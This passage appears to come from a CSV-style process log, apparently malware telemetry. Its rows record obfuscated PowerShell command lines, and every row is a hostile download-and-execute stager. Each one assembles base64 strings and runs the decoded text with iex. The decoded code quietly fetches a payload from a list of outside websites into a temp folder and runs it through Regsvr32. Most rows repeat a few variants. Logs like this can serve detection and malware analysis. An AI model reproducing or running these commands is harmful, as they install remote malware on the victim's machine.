Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'aEP65gDdTUuHUzHXL3pzGmfXV6TLsw1gHtw0I23AcKQw+wbbgl80hdNfof/CSfxu4W7XUBBk';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'afEFKX6OFm4UE3oLz1cacEQI3XH/7X1CFJaTxFaxXMB7bqbL3b/QjDbI8E6RlL1zIeOxcvhU';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'cLHUUHjIkH/TUVxsjtitaneaG4Q6w500dtX0uRYPdBhdP0yfH+68I7k4nN4VWsTMf/EcqTTl';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'hQeACLNg1VXz6BaIZgugfLOyiLT2daXPeBAk0AReNcZxuyMz2obPFLV/F0sUTwQfznn9uUNj';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'iLnQAdgJtWeGM6W/Nlds66EPfh7wPF6mAv2yAc1o7/wzO/g7/b2Y3DO9Yno93JrRMb/vTulf';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'jAlmpRBkIRRDOBPJP/oFWpKn1vrhJ3M2arnWGwMjhR+GyBqTdZ2bgxdAe85zyfC08CcITIYH';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'kEaQxb+F9DP0JdpZ+emVGh+dRGr/fTfNgQ5c+PqR1KKa0PkmvB3fgufwubFgYaptwGacKdFt';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'kv+Ye5aKgeA6RsxSHAdt3MbDZ/FRiwfNryT9/Nmb2iunQtKCFyPPb4U7TugedVQ4W2t9vK7G';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'lSr5HjcPHgxKNUYuwu7Po7CT33FayxNlKCyVfbtwbBOYRnTZ1hf8BDCFp2rbvzeDl/0YAkhP';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'m6Nd07E7X/r7EAERPuPIlcBduelp9T12Fs2Rsu+XdA/Bz+e7AC7dvHaJRaTvbcN6SqdmfytX';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'mR6ZXm8vjbupbhH6G/DrQ0nwppCEtnDf37wr2TCgMIZQlXYT/wP+0rkg5zUDe4U20/OFuMyf';$poAqp='ICAgICAgICBXcml0ZS1Ib3N0ICJBbUpEWiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW';$MYYKc='50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3Rvd29ya3MuY2EvcGhwbXlhZG1pbi9YLyIsImh0dHBzOi8vdmlldHJvbGwudm4vd3AtY29udGVudC9UUWRrUC8iLCJodHRwOi8vd2lldHNlZGV2cmllcy5ubC93ZWJzdGF0cy9TZUNQeWlRYmdtWllCTG93c29LZS8iLCJodHRwOi8vYnJlbm5hbmFzaWEuY29tL2ltYWdlcy9jUDhDTUJZNXF4MXUvIiwiaHR0cDovL2JhbmNoYW5uLmNvbS9wcm9kdWN0LzR5S2NMZWZsWVBCU3YxMS8iLCJodHRwczovL3RpbmVyaWlidWN1cmVzdGVuaS5yby93cC1pbmNsdWRlcy9ZQnlndy8iKTskdD0iUXlmWmd0clZ1IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFJsYWR1T0pETlYuSE5BO1JlZ3N2cjMyLmV4ZSAiJGRcUmxhZHVPSkROVi5ITkEiO2JyZWFrfSBjYXRjaCB7IH19';$sW=$poAqp+$MYYKc;$URKR=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($sW));$sW=$URKR;iex($sW)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'n6xnnhJboBVjm52UUCF3I9EmzktZI8qqJX4Szuo33V0RzsofmG9cn5cT7X1+SlZP6XXEanVg';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'nfeclZhxjKfGyi77AygADSuronm2SblkMq5TIuzYQkokiVV5s7yjYOH58wjcJMduc5anvc79';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'nuq7mm5A/BoCgcTx1uLdoIA+9CrbcW473/KwHvfUOcpiv/byGyie2zckz8PE8INCbTviOLvl';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'nx+XtExoMsf/zMJoL8Dzx/PeecwN06aZ4LpsGm/OBN+z1jvhRIzTVsMKAb7vpdVHTN+3FXYY';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'p6TVAmbvfJofgyPMWyqUecRWNnV8iFYUnyAEbzVlkqprnkN48cWkkaYSAYyuZDesE2W2qByj';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'pR/6oMiH74BfoSPeu/g1jJmYG5trHv6aF7OXuvLlAW8WHP3a+gbNxdIUJYLhPP+cSAK+r0ev';$poAqp='ICAgICAgICBXcml0ZS1Ib3N0ICJBbUpEWiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW';$MYYKc='50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3Rvd29ya3MuY2EvcGhwbXlhZG1pbi9YLyIsImh0dHBzOi8vdmlldHJvbGwudm4vd3AtY29udGVudC9UUWRrUC8iLCJodHRwOi8vd2lldHNlZGV2cmllcy5ubC93ZWJzdGF0cy9TZUNQeWlRYmdtWllCTG93c29LZS8iLCJodHRwOi8vYnJlbm5hbmFzaWEuY29tL2ltYWdlcy9jUDhDTUJZNXF4MXUvIiwiaHR0cDovL2JhbmNoYW5uLmNvbS9wcm9kdWN0LzR5S2NMZWZsWVBCU3YxMS8iLCJodHRwczovL3RpbmVyaWlidWN1cmVzdGVuaS5yby93cC1pbmNsdWRlcy9ZQnlndy8iKTskdD0iUXlmWmd0clZ1IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFJsYWR1T0pETlYuSE5BO1JlZ3N2cjMyLmV4ZSAiJGRcUmxhZHVPSkROVi5ITkEiO2JyZWFrfSBjYXRjaCB7IH19